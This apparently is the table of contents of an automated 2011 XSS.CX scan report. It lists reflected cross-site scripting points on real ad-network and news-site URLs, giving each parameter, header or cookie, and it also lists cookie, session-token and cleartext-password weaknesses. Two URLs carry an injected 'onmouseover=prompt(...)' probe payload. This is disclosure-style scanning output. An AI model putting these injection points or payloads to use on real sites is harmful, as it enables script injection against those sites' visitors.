XSS, DORK Report, Cross Site Scripting Report for April 12, 2011

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Tue Apr 12 10:38:19 CDT 2011.



1. Cross-site scripting (reflected)

1.1. http://a.collective-media.net/adj/cm.foxnews/tier2_031010 [REST URL parameter 2]

1.2. http://a.collective-media.net/adj/cm.foxnews/tier2_031010 [REST URL parameter 3]

1.3. http://a.collective-media.net/adj/cm.foxnews/tier2_031010 [name of an arbitrarily supplied request parameter]

1.4. http://a.collective-media.net/adj/cm.foxnews/tier2_031010 [sz parameter]

1.5. http://a.rfihub.com/sed [pa parameter]

1.6. http://ad.doubleclick.net/adi/fnc/root/stocksearch [name of an arbitrarily supplied request parameter]

1.7. http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2 [name of an arbitrarily supplied request parameter]

1.8. http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2 [name of an arbitrarily supplied request parameter]

1.9. http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2 [sz parameter]

1.10. http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2 [sz parameter]

1.11. http://ad.doubleclick.net/adj/cm.foxnews/tier2_031010 [net parameter]

1.12. http://ad.doubleclick.net/adj/iblocal.hearsttv.wptz/detail [REST URL parameter 3]

1.13. http://ad.doubleclick.net/adj/iblocal.hearsttv.wptz/index [REST URL parameter 3]

1.14. http://ad.doubleclick.net/adj/ibs.pla.homepage/local [kw parameter]

1.15. http://ad.doubleclick.net/adj/ibs.pla.homepage/local [name of an arbitrarily supplied request parameter]

1.16. http://ad.doubleclick.net/adj/ibs.pla.news/local [kw parameter]

1.17. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745 [REST URL parameter 2]

1.18. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745 [REST URL parameter 3]

1.19. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745 [click parameter]

1.20. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745 [name of an arbitrarily supplied request parameter]

1.21. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

1.22. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]

1.23. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]

1.24. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

1.25. http://admeld.adnxs.com/usersync [admeld_callback parameter]

1.26. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]

1.27. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]

1.28. http://ads.adap.tv/beacons [callback parameter]

1.29. http://ads.adbrite.com/adserver/vdi/682865 [REST URL parameter 3]

1.30. http://ads.adbrite.com/adserver/vdi/682865 [r parameter]

1.31. http://ads.adbrite.com/adserver/vdi/684339 [REST URL parameter 3]

1.32. http://ads.adbrite.com/adserver/vdi/712156 [REST URL parameter 3]

1.33. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]

1.34. http://ads.adbrite.com/adserver/vdi/762701 [REST URL parameter 3]

1.35. http://ads.adbrite.com/adserver/vdi/779045 [REST URL parameter 3]

1.36. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

1.37. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

1.38. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

1.39. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

1.40. http://ads.pointroll.com/PortalServe/ [flash parameter]

1.41. http://ads.pointroll.com/PortalServe/ [r parameter]

1.42. http://ads.pointroll.com/PortalServe/ [redir parameter]

1.43. http://ads.pointroll.com/PortalServe/ [time parameter]

1.44. http://adserver.veruta.com/cookiematch.fcgi [admeld_adprovider_id parameter]

1.45. http://adserver.veruta.com/cookiematch.fcgi [admeld_callback parameter]

1.46. http://adserving.cpxinteractive.com/st [ad_size parameter]

1.47. http://adserving.cpxinteractive.com/st [section parameter]

1.48. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5 [mpt parameter]

1.49. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5 [mpvc parameter]

1.50. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5 [name of an arbitrarily supplied request parameter]

1.51. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

1.52. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

1.53. http://api.kickapps.com/rest/comments/62976 [callback parameter]

1.54. http://api.zap2it.com/tvlistings/ZCShowtimeAction.do [aid parameter]

1.55. http://b.scorecardresearch.com/beacon.js [c1 parameter]

1.56. http://b.scorecardresearch.com/beacon.js [c10 parameter]

1.57. http://b.scorecardresearch.com/beacon.js [c15 parameter]

1.58. http://b.scorecardresearch.com/beacon.js [c2 parameter]

1.59. http://b.scorecardresearch.com/beacon.js [c3 parameter]

1.60. http://b.scorecardresearch.com/beacon.js [c4 parameter]

1.61. http://b.scorecardresearch.com/beacon.js [c5 parameter]

1.62. http://b.scorecardresearch.com/beacon.js [c6 parameter]

1.63. http://bh.contextweb.com/bh/sync/admeld [admeld_adprovider_id parameter]

1.64. http://bh.contextweb.com/bh/sync/admeld [admeld_callback parameter]

1.65. http://clientapps.kickapps.com/hearst/articleTitles.php [as parameter]

1.66. http://clientapps.kickapps.com/hearst/articleTitles.php [divName parameter]

1.67. http://clientapps.kickapps.com/hearst/articleTitles.php [lSize parameter]

1.68. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php [dName parameter]

1.69. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php [dName parameter]

1.70. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php [id parameter]

1.71. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php [pSize parameter]

1.72. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php [tzAbbr parameter]

1.73. http://clientapps.kickapps.com/hearst/comments/start.php [id parameter]

1.74. http://clientapps.kickapps.com/hearst/comments/start.php [tzAbbr parameter]

1.75. http://d7.zedo.com/jsc/d3/fl.js [l parameter]

1.76. http://d7.zedo.com/jsc/d3/fl.js [l parameter]

1.77. http://d7.zedo.com/lar/v10-003/d7/jsc/flr.js [l parameter]

1.78. http://ds.addthis.com/red/psi/sites/www.ingeniux.com/p.json [callback parameter]

1.79. http://ds.addthis.com/red/psi/sites/www.marqui.com/p.json [callback parameter]

1.80. http://ds.addthis.com/red/psi/sites/www.wcax.com/p.json [callback parameter]

1.81. http://ib.adnxs.com/ab [cnd parameter]

1.82. http://ib.adnxs.com/ab [referrer parameter]

1.83. http://ib.adnxs.com/ab [tt_code parameter]

1.84. http://ib.adnxs.com/ptj [redir parameter]

1.85. http://js.revsci.net/gateway/gw.js [csid parameter]

1.86. http://k.collective-media.net/cmadj/cm.foxnews/tier2_031010 [REST URL parameter 2]

1.87. http://lfov.net/webrecorder/g/chimera.js [vid parameter]

1.88. http://nmp.newsgator.com/NGBuzz/buzz.ashx [_dsrId parameter]

1.89. http://nmp.newsgator.com/NGBuzz/buzz.ashx [buzzId parameter]

1.90. http://nmp.newsgator.com/NGBuzz/buzz.ashx [name of an arbitrarily supplied request parameter]

1.91. http://pixel.adsafeprotected.com/jspix [anId parameter]

1.92. http://pixel.adsafeprotected.com/jspix [campId parameter]

1.93. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]

1.94. http://pixel.adsafeprotected.com/jspix [pubId parameter]

1.95. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

1.96. http://r.turn.com/server/pixel.htm [fpid parameter]

1.97. http://r.turn.com/server/pixel.htm [sp parameter]

1.98. http://studio-5.financialcontent.com/worldnow [Module parameter]

1.99. http://studio-5.financialcontent.com/worldnow [REST URL parameter 1]

1.100. http://studio-5.financialcontent.com/worldnow [name of an arbitrarily supplied request parameter]

1.101. http://ulocal.wptz.com/service/isUserLoggedIn.kickAction [callback parameter]

1.102. http://um.simpli.fi/am_js.js [admeld_adprovider_id parameter]

1.103. http://um.simpli.fi/am_js.js [admeld_callback parameter]

1.104. http://um.simpli.fi/am_match [admeld_adprovider_id parameter]

1.105. http://um.simpli.fi/am_match [admeld_callback parameter]

1.106. http://um.simpli.fi/am_redirect_js [admeld_adprovider_id parameter]

1.107. http://um.simpli.fi/am_redirect_js [admeld_callback parameter]

1.108. http://video.foxnews.com/v/feed/video/4636974.js [callback parameter]

1.109. http://video.foxnews.com/v/feed/video/4637817.js [callback parameter]

1.110. http://video.foxnews.com/v/feed/video/4637903.js [callback parameter]

1.111. http://video.foxnews.com/v/feed/video/4638065.js [callback parameter]

1.112. http://wcax.upickem.net/engine/Splash.aspx [name of an arbitrarily supplied request parameter]

1.113. http://wptz.placelocal.com/_js/ad.js.php [adWidth parameter]

1.114. http://wptz.placelocal.com/_js/scriptloader.js.php [loadedparam parameter]

1.115. http://wptz.placelocal.com/_js/scriptloader.js.php [name of an arbitrarily supplied request parameter]

1.116. http://wptz.placelocal.com/_js/scriptloader.js.php [suffix parameter]

1.117. http://www.internetrix.net/action/event_signup/1066 [REST URL parameter 1]

1.118. http://www.internetrix.net/captcha/77ebd8dc1911e2a888fa4585da1fe3e3.png [REST URL parameter 1]

1.119. http://www.internetrix.net/captcha/77ebd8dc1911e2a888fa4585da1fe3e3.png [REST URL parameter 2]

1.120. http://www.internetrix.net/cgi-bin/ajax/utm_vars.cgi [REST URL parameter 1]

1.121. http://www.internetrix.net/favicon.ico [REST URL parameter 1]

1.122. http://www.internetrix.net/flash/video.swf [REST URL parameter 1]

1.123. http://www.internetrix.net/flash/video.swf [REST URL parameter 2]

1.124. http://www.internetrix.net/freestyle/optimizer [REST URL parameter 1]

1.125. http://www.internetrix.net/freestyle/optimizer [REST URL parameter 2]

1.126. http://www.internetrix.net/general.css [REST URL parameter 1]

1.127. http://www.internetrix.net/optimizer.html [REST URL parameter 1]

1.128. http://www.internetrix.net/page/accreditations/ [REST URL parameter 1]

1.129. http://www.internetrix.net/page/accreditations/dbcde-panel-member/ [REST URL parameter 1]

1.130. http://www.internetrix.net/page/articles/ [REST URL parameter 1]

1.131. http://www.internetrix.net/page/articles/latest-news/ [REST URL parameter 1]

1.132. http://www.internetrix.net/page/articles/newsletters/ [REST URL parameter 1]

1.133. http://www.internetrix.net/page/contact-us/ [REST URL parameter 1]

1.134. http://www.internetrix.net/page/contact-us/jobs-at-internetrix/ [REST URL parameter 1]

1.135. http://www.internetrix.net/page/events/ [REST URL parameter 1]

1.136. http://www.internetrix.net/page/products/ [REST URL parameter 1]

1.137. http://www.mvtimes.com/marthas-vineyard/article.php [id parameter]

1.138. http://www.mvtimes.com/marthas-vineyard/article.php [name of an arbitrarily supplied request parameter]

1.139. http://www.mvtimes.com/marthas-vineyard/classifieds/110.php/%22onmouseover=prompt(945581)%3E [REST URL parameter 4]

1.140. http://www.mvtimes.com/marthas-vineyard/classifieds/110.php/%22onmouseover=prompt(945581)%3E [name of an arbitrarily supplied request parameter]

1.141. http://www.wcax.com/Global/link.asp [name of an arbitrarily supplied request parameter]

1.142. http://www.wcax.com/global/interface/httprequest/hrproxy.asp [url parameter]

1.143. http://www.wcax.com/global/link.asp [function parameter]

1.144. http://www.wcax.com/global/link.asp [mode parameter]

1.145. http://www.wcax.com/global/link.asp [referrer parameter]

1.146. http://y.cdn.adblade.com/imps.php [name of an arbitrarily supplied request parameter]

1.147. http://y.cdn.adblade.com/imps.php [tpUrl parameter]

1.148. http://adserving.cpxinteractive.com/st [Referer HTTP header]

1.149. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]

1.150. http://bh.contextweb.com/bh/sync/admeld [V cookie]

1.151. http://k.collective-media.net/cmadj/cm.foxnews/tier2_031010 [cli cookie]

1.152. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom [meld_sess cookie]

1.153. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom [meld_sess cookie]

1.154. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros [meld_sess cookie]

1.155. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros [meld_sess cookie]

1.156. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics [meld_sess cookie]

1.157. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics [meld_sess cookie]

1.158. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/ros [meld_sess cookie]

1.159. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/ros [meld_sess cookie]

1.160. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/300x250/ros [meld_sess cookie]

1.161. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/300x250/ros [meld_sess cookie]

1.162. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros [meld_sess cookie]

1.163. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros [meld_sess cookie]

2. Flash cross-domain policy

2.1. http://fls.doubleclick.net/crossdomain.xml

2.2. http://segment-pixel.invitemedia.com/crossdomain.xml

2.3. http://feeds.bbci.co.uk/crossdomain.xml

2.4. http://googleads.g.doubleclick.net/crossdomain.xml

2.5. http://newsrss.bbc.co.uk/crossdomain.xml

3. Cleartext submission of password

3.1. http://appointron.com/login

3.2. http://appointron.com/users/new

3.3. http://wcax.upickem.net/engine/Splash.aspx

3.4. http://www.vermontopia.com/favicon.ico

3.5. http://www.wcax.com/global/PM/registration.asp

4. Session token in URL

4.1. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php

4.2. http://nmp.newsgator.com/NGBuzz/buzz.ashx

4.3. https://www.google.com/accounts/Captcha

4.4. https://www.google.com/accounts/NewAccount

4.5. http://www.wptz.com/index.html

5. Cookie scoped to parent domain

5.1. http://api.twitter.com/1/WCAX_DAN/lists/wcaxweather/statuses.json

5.2. http://api.twitter.com/1/WCAX_Dan%20/lists/wcaxnews/statuses.json

5.3. http://a.rfihub.com/cm

5.4. http://a.rfihub.com/cm

5.5. http://a.rfihub.com/sed

5.6. http://a.rfihub.com/tk.gif

5.7. http://a1.interclick.com/ColDta.aspx

5.8. http://ad.afy11.net/ad

5.9. http://ad.doubleclick.net/adj/wn.loc.wcax/political

5.10. http://ad.turn.com/server/ads.js

5.11. http://admeld.adnxs.com/usersync

5.12. http://admeld.lucidmedia.com/clicksense/admeld/match

5.13. http://ads.adap.tv/beacons

5.14. http://ads.adap.tv/cookie

5.15. http://ads.adbrite.com/adserver/vdi/682865

5.16. http://ads.adbrite.com/adserver/vdi/684339

5.17. http://ads.adbrite.com/adserver/vdi/712156

5.18. http://ads.adbrite.com/adserver/vdi/742697

5.19. http://ads.adbrite.com/adserver/vdi/762701

5.20. http://ads.adbrite.com/adserver/vdi/779045

5.21. http://ads.pointroll.com/PortalServe/

5.22. http://ads.revsci.net/adserver/ako

5.23. http://ads2.adbrite.com/v0/ad

5.24. http://adx.adnxs.com/mapuid

5.25. http://ak1.abmr.net/is/content.yieldmanager.com

5.26. http://ak1.abmr.net/is/tag.admeld.com

5.27. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5

5.28. http://api.bizographics.com/v1/profile.redirect

5.29. http://b.scorecardresearch.com/b

5.30. http://bcp.crwdcntrl.net/4/c=492%7Crand=102438378%7Cpv=y%7Crt=ifr

5.31. http://bcp.crwdcntrl.net/4/c=492%7Crand=155948644%7Cpv=y%7Crt=ifr

5.32. http://bcp.crwdcntrl.net/4/c=492%7Crand=188465373%7Cpv=y%7Crt=ifr

5.33. http://bcp.crwdcntrl.net/4/c=492%7Crand=277884487%7Cpv=y%7Crt=ifr

5.34. http://bcp.crwdcntrl.net/4/c=492%7Crand=363699370%7Cpv=y%7Crt=ifr

5.35. http://bcp.crwdcntrl.net/4/c=492%7Crand=377648253%7Cpv=y%7Crt=ifr

5.36. http://bcp.crwdcntrl.net/4/c=492%7Crand=554931350%7Cpv=y%7Crt=ifr

5.37. http://bcp.crwdcntrl.net/4/c=492%7Crand=576119975%7Cpv=y%7Crt=ifr

5.38. http://bcp.crwdcntrl.net/4/c=492%7Crand=577383278%7Cpv=y%7Crt=ifr

5.39. http://bcp.crwdcntrl.net/4/c=492%7Crand=614877015%7Cpv=y%7Crt=ifr

5.40. http://bcp.crwdcntrl.net/4/c=492%7Crand=622721104%7Cpv=y%7Crt=ifr

5.41. http://bcp.crwdcntrl.net/4/c=492%7Crand=624837915%7Cpv=y%7Crt=ifr

5.42. http://bcp.crwdcntrl.net/4/c=492%7Crand=708673296%7Cpv=y%7Crt=ifr

5.43. http://bcp.crwdcntrl.net/4/c=492%7Crand=759762185%7Cpv=y%7Crt=ifr

5.44. http://bcp.crwdcntrl.net/4/c=492%7Crand=769353744%7Cpv=y%7Crt=ifr

5.45. http://bcp.crwdcntrl.net/4/c=492%7Crand=770680268%7Cpv=y%7Crt=ifr

5.46. http://bcp.crwdcntrl.net/4/c=492%7Crand=775566438%7Cpv=y%7Crt=ifr

5.47. http://bcp.crwdcntrl.net/4/c=492%7Crand=827998426%7Cpv=y%7Crt=ifr

5.48. http://bcp.crwdcntrl.net/4/c=492%7Crand=939941480%7Cpv=y%7Crt=ifr

5.49. http://bcp.crwdcntrl.net/4/c=492%7Crand=996397162%7Cpv=y%7Crt=ifr

5.50. http://bh.contextweb.com/bh/rtset

5.51. http://bh.contextweb.com/bh/sync/admeld

5.52. http://bs.serving-sys.com/BurstingPipe/adServer.bs

5.53. http://cf.addthis.com/red/p.json

5.54. http://cspix.media6degrees.com/orbserv/hbpix

5.55. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/4608069584519221037

5.56. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4608069584519221037

5.57. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/4608069584519221037

5.58. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4608069584519221037

5.59. http://d.p-td.com/r/dt/id/L21rdC80L21waWQvMTgwNDg2NA/mpuid/4d97b063-cd55-fcc9-f79b-3dc3c331fd5b

5.60. http://d7.zedo.com/lar/v10-003/d7/jsc/flr.js

5.61. http://data.adsrvr.org/map/cookie/google

5.62. http://ds.addthis.com/red/psi/sites/www.ingeniux.com/p.json

5.63. http://ds.addthis.com/red/psi/sites/www.marqui.com/p.json

5.64. http://h.zedo.com/init/0.4907234441488981/g.gif

5.65. http://h.zedo.com/init/0.6948210536502302/g.gif

5.66. http://ib.adnxs.com/ab

5.67. http://ib.adnxs.com/click/4XoUrkfh9j_hehSuR-H2PwAAAMDMzAhAexSuR-H6EUB7FK5H4foRQGyzTtWol9w48f5MdWfsOnh2bqRNAAAAABUbAAC1AAAANQEAAAIAAADXfgQA0WMAAAEAAABVU0QAVVNEACwB-gC1GHIAoA8BAQUCAAQAAAAAuSbBxwAAAAA./cnd=!aBajcAjsLBDX_REYACDRxwEocjFmZmY-4foRQEITCAAQABgAIAEo_v__________AUgAUABYtTFgAGi1Ag../referrer=http%3A%2F%2Fwww.mvtimes.com%2Fmarthas-vineyard%2Fon-island.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DByl0zdm6kTf_uL83P6Aa8svGiCu_675oCp439xBrv8I6PDAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01NTk3ODc1MDQ2NTQwODA5sgEPd3d3Lm12dGltZXMuY29tugEKMzAweDI1MF9hc8gBCdoBNWh0dHA6Ly93d3cubXZ0aW1lcy5jb20vbWFydGhhcy12aW5leWFyZC9vbi1pc2xhbmQucGhwmAKWC8ACBMgCq4KlDqgDAegDsCroA7II9QMABABE9QMgAAAAgAa-s939482e0DA%26num%3D1%26sig%3DAGiWqtzEpohHrVWeJEJyiZUS6oseA0vyiQ%26client%3Dca-pub-5597875046540809%26adurl%3Dhttp://www.kwanzoo.com/widget/customized/2858/load

5.68. http://ib.adnxs.com/getuid

5.69. http://ib.adnxs.com/getuidu

5.70. http://ib.adnxs.com/if

5.71. http://ib.adnxs.com/mapuid

5.72. http://ib.adnxs.com/ptj

5.73. http://ib.adnxs.com/ptj

5.74. http://ib.adnxs.com/ptj

5.75. http://ib.adnxs.com/pxj

5.76. http://ib.adnxs.com/seg

5.77. http://ib.adnxs.com/setuid

5.78. http://id.google.com/verify/EAAAAB6lkOs5u81YRTwCEWoG6wY.gif

5.79. http://id.google.com/verify/EAAAAPvBCy6A6JaBSsfQHfS92x4.gif

5.80. http://image2.pubmatic.com/AdServer/Pug

5.81. http://insight.adsrvr.org/track/conv

5.82. http://js.revsci.net/gateway/gw.js

5.83. http://leadback.advertising.com/adcedge/lb

5.84. http://load.exelator.com/load/

5.85. http://loadm.exelator.com/load/

5.86. http://m.adnxs.com/msftcookiehandler

5.87. http://metrics.foxnews.com/b/ss/foxnews/1/H.20.3/s57025025668554

5.88. http://odb.outbrain.com/utils/get

5.89. http://odb.outbrain.com/utils/ping.html

5.90. http://pix04.revsci.net/D08734/a1/0/0/0.gif

5.91. http://pix04.revsci.net/E05510/b3/0/3/1003161/184358339.js

5.92. http://pix04.revsci.net/E05510/b3/0/3/1003161/317116761.js

5.93. http://pix04.revsci.net/E05510/b3/0/3/1003161/411477495.js

5.94. http://pix04.revsci.net/E05510/b3/0/3/1003161/564853216.js

5.95. http://pix04.revsci.net/E05510/b3/0/3/1003161/695826942.js

5.96. http://pix04.revsci.net/E05510/b3/0/3/1003161/737002840.js

5.97. http://pix04.revsci.net/E05510/b3/0/3/1003161/779915473.js

5.98. http://pix04.revsci.net/E05510/b3/0/3/1003161/794483737.js

5.99. http://pix04.revsci.net/E05510/b3/0/3/1003161/79844803.js

5.100. http://pix04.revsci.net/E05510/b3/0/3/1003161/844383816.js

5.101. http://pix04.revsci.net/E05510/b3/0/3/1003161/846854188.js

5.102. http://pix04.revsci.net/E05511/a4/0/0/pcx.js

5.103. http://pix04.revsci.net/E05511/b3/0/3/0902121/10608952.js

5.104. http://pix04.revsci.net/E05511/b3/0/3/0902121/135299998.js

5.105. http://pix04.revsci.net/E05511/b3/0/3/0902121/209148801.js

5.106. http://pix04.revsci.net/E05511/b3/0/3/0902121/21225103.js

5.107. http://pix04.revsci.net/E05511/b3/0/3/0902121/281102501.js

5.108. http://pix04.revsci.net/E05511/b3/0/3/0902121/285224161.js

5.109. http://pix04.revsci.net/E05511/b3/0/3/0902121/316223818.js

5.110. http://pix04.revsci.net/E05511/b3/0/3/0902121/354226275.js

5.111. http://pix04.revsci.net/E05511/b3/0/3/0902121/64495114.js

5.112. http://pix04.revsci.net/E05511/b3/0/3/0902121/695595891.js

5.113. http://pix04.revsci.net/E05511/b3/0/3/0902121/699418016.js

5.114. http://pix04.revsci.net/E05511/b3/0/3/0902121/700224037.js

5.115. http://pix04.revsci.net/E05511/b3/0/3/0902121/71706519.js

5.116. http://pix04.revsci.net/E05511/b3/0/3/0902121/734832866.js

5.117. http://pix04.revsci.net/E05511/b3/0/3/0902121/73563402.js

5.118. http://pix04.revsci.net/E05511/b3/0/3/0902121/806386945.js

5.119. http://pix04.revsci.net/E05511/b3/0/3/0902121/871550918.js

5.120. http://pix04.revsci.net/E05511/b3/0/3/0902121/914837697.js

5.121. http://pix04.revsci.net/E05511/b3/0/3/0902121/918432446.js

5.122. http://pixel.33across.com/ps/

5.123. http://pixel.invitemedia.com/adnxs_sync

5.124. http://pixel.quantserve.com/pixel

5.125. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif

5.126. http://pixel.quantserve.com/pixel/p-86ZJnSph3DaTI.gif

5.127. http://pixel.quantserve.com/seg/p-ddEiIs2qFSY46.js

5.128. http://pixel.rubiconproject.com/tap.php

5.129. http://r.openx.net/set

5.130. http://r.turn.com/r/bd

5.131. http://r.turn.com/r/beacon

5.132. http://r.turn.com/server/pixel.htm

5.133. http://r1-ads.ace.advertising.com/ctst=1/site=751177/size=728090/u=2/bnum=78539819/hr=12/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=

5.134. http://r1-ads.ace.advertising.com/site=751177/size=728090/u=2/bnum=78539819/hr=12/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=

5.135. http://segment-pixel.invitemedia.com/pixel

5.136. http://segment-pixel.invitemedia.com/unpixel

5.137. http://segments.adap.tv/data

5.138. http://segments.adap.tv/data/

5.139. http://server.iad.liveperson.net/hc/47227738/

5.140. http://sync.adap.tv/sync

5.141. http://sync.mathtag.com/sync/img

5.142. http://sync.tidaltv.com/adaptv.ashx

5.143. http://tacoda.at.atwola.com/rtx/r.js

5.144. http://tags.bluekai.com/ids

5.145. http://tags.bluekai.com/site/2174

5.146. http://tags.bluekai.com/site/2731

5.147. http://tags.bluekai.com/site/668

5.148. http://vlog.leadforce1.com/bf/bf.php

5.149. http://www.valtira.com/gwo

5.150. http://www.wesh.com/images/structures/misc/play_overlay_small.png

5.151. http://www.wmur.com/images/structures/tabs/sponsor_tile_transparent.png

5.152. http://www.wptz.com/

5.153. http://www.wtp101.com/ab_sync

5.154. http://xcdn.xgraph.net/15530/db/xg.gif

5.155. http://y.cdn.adblade.com/imps.php

6. Cookie without HttpOnly flag set

6.1. http://affiliate.kickapps.com/service/getWidget.kickAction

6.2. http://kellwood.com/

6.3. http://pixel.adsafeprotected.com/jspix

6.4. http://provideby.com/show_dynamic/coupon/livingsocial-fnews/300x250-POL/

6.5. http://s.clickability.com/s

6.6. http://t3.trackalyzer.com/trackalyze.asp

6.7. http://trc.taboolasyndication.com/hearst-wptz/trc/2/json

6.8. http://ulocal.wptz.com/service/isUserLoggedIn.kickAction

6.9. http://valtira.com/

6.10. http://www.clickability.com/

6.11. http://www.clickability.com/crossdomain.xml

6.12. http://www.clickability.com/googlewotep

6.13. http://www.clickability.com/templates/Corp_Scripts_Template.js

6.14. http://www.clickability.com/templates/browser.js

6.15. http://www.clickability.com/templates/clk_dbtemp_main.css

6.16. http://www.clickability.com/templates/popovers.js

6.17. http://www.clickability.com/templates/swfobject.js

6.18. http://www.mvtimes.com/marthas-vineyard/directory/

6.19. http://www.valtira.com/gwo

6.20. http://www.vermontopia.com/

6.21. http://69.16.184.116/v8u2m5i8/cds/tags2/4-1007209.js

6.22. http://a.rfihub.com/cm

6.23. http://a.rfihub.com/cm

6.24. http://a.rfihub.com/sed

6.25. http://a.rfihub.com/tk.gif

6.26. http://a1.interclick.com/ColDta.aspx

6.27. http://a1.interclick.com/getInPageJSProcess.aspx

6.28. http://ad.afy11.net/ad

6.29. http://ad.doubleclick.net/adj/wn.loc.wcax/political

6.30. http://ad.turn.com/server/ads.js

6.31. http://ad.yieldmanager.com/iframe3

6.32. http://ad.yieldmanager.com/iframe3

6.33. http://ad.yieldmanager.com/imp

6.34. http://ad.yieldmanager.com/pixel

6.35. http://ad.yieldmanager.com/unpixel

6.36. http://admeld.lucidmedia.com/clicksense/admeld/match

6.37. http://admonkey.dapper.net/AdBriteUIDMonster

6.38. http://ads.adap.tv/beacons

6.39. http://ads.adap.tv/cookie

6.40. http://ads.adbrite.com/adserver/vdi/682865

6.41. http://ads.adbrite.com/adserver/vdi/684339

6.42. http://ads.adbrite.com/adserver/vdi/712156

6.43. http://ads.adbrite.com/adserver/vdi/742697

6.44. http://ads.adbrite.com/adserver/vdi/762701

6.45. http://ads.adbrite.com/adserver/vdi/779045

6.46. http://ads.financialcontent.com/www/delivery/afr.php

6.47. http://ads.financialcontent.com/www/delivery/lg.php

6.48. http://ads.pointroll.com/PortalServe/

6.49. http://ads.revsci.net/adserver/ako

6.50. http://ads2.adbrite.com/v0/ad

6.51. http://affiliate.kickapps.com/crossdomain.xml

6.52. http://ak1.abmr.net/is/content.yieldmanager.com

6.53. http://ak1.abmr.net/is/tag.admeld.com

6.54. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5

6.55. http://analytics.worldnow.com/dcsuhch2hzersfqyzf2de5tct_4d8l/dcs.gif

6.56. http://analytics.worldnow.com/dcsuhch2hzersfqyzf2de5tct_4d8l/dcs.gif

6.57. http://api.bizographics.com/v1/profile.redirect

6.58. http://api.twitter.com/1/WCAX_DAN/lists/wcaxweather/statuses.json

6.59. http://ar.atwola.com/atd

6.60. http://b.scorecardresearch.com/b

6.61. http://bcp.crwdcntrl.net/4/c=492%7Crand=102438378%7Cpv=y%7Crt=ifr

6.62. http://bcp.crwdcntrl.net/4/c=492%7Crand=155948644%7Cpv=y%7Crt=ifr

6.63. http://bcp.crwdcntrl.net/4/c=492%7Crand=188465373%7Cpv=y%7Crt=ifr

6.64. http://bcp.crwdcntrl.net/4/c=492%7Crand=277884487%7Cpv=y%7Crt=ifr

6.65. http://bcp.crwdcntrl.net/4/c=492%7Crand=363699370%7Cpv=y%7Crt=ifr

6.66. http://bcp.crwdcntrl.net/4/c=492%7Crand=377648253%7Cpv=y%7Crt=ifr

6.67. http://bcp.crwdcntrl.net/4/c=492%7Crand=554931350%7Cpv=y%7Crt=ifr

6.68. http://bcp.crwdcntrl.net/4/c=492%7Crand=576119975%7Cpv=y%7Crt=ifr

6.69. http://bcp.crwdcntrl.net/4/c=492%7Crand=577383278%7Cpv=y%7Crt=ifr

6.70. http://bcp.crwdcntrl.net/4/c=492%7Crand=614877015%7Cpv=y%7Crt=ifr

6.71. http://bcp.crwdcntrl.net/4/c=492%7Crand=622721104%7Cpv=y%7Crt=ifr

6.72. http://bcp.crwdcntrl.net/4/c=492%7Crand=624837915%7Cpv=y%7Crt=ifr

